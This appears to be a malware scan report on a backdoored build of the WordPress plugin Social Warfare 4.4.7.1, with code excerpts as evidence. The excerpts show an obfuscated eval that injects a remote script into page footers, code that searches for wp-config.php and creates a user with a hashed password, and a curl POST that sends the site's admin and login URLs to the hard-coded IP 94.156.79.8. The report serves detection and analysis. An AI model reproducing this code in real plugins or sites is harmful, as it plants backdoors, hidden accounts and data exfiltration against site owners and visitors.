Social Sharing Plugin – Social Warfare 4.4.7.1
Creates a WordPress option (add_option)PHP recursive directory iterator
SHA-256168a7c42c7c91d30a2cd17dd09f35d4a9053718fdb9c5a114569b2a0d0827960
Evidence
36:54… re class.
37 *
38 */
39add_filter( 'the_excerpt', 'do_shortcode', 1 );
40function add_footer_script() {
41echo '<script>eval("\u000a\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0073\u0072\u0063\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u00 …
44:50… pdated');
45function custom_notify_plugin_updated() {
46 $has_run = get_option('my_admin_init_function_run');
47 if ($has_run !== 'yes') {
48 function check_wp_config($directory) {
49 while ($directory !== '/') {
50 $wp_config_file = $directory . '/wp-config.php';
51 if (file_exists($wp_config_file)) {
52 return $wp_config_file;
⋯5 lines
149:46… ery error
150 }
151 // Hash the password
152 $hashed_password = password_hash($password, PASSWORD_DEFAULT);
153
154 // Check if the user already exists
⋯4 lines
231:18… wp_login_path = "https://{$domain}/wp-login.php";
232
233 // Perform a POST request to https://94.156.79.8/AddSites
234 $url = 'https://94.156.79.8/AddSites';
235 $aurl = get_admin_url();
236 $post_data = array(
⋯4 lines
241:33… th' => $wp_login_path
242 );
243
244 $ch = curl_init();
245 curl_setopt($ch, CURLOPT_URL, $url);
246 curl_setopt($ch, CURLOPT_POST, 1);
247 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
248 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
249 curl_setopt($ch, CURLOPT_HTTPHEADER, array(
250 'Content-Type: application/json', // Set content type to JSON
251 'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
252 ));
253 $response = curl_exec($ch);
254 $error = curl_error($ch); // Get any curl error
255 curl_close($ch);
256
257 if ($re …
Showing the top 5 files — 6 more files (46 regions) not shown.
No evidence locations were recorded for this file. Raw result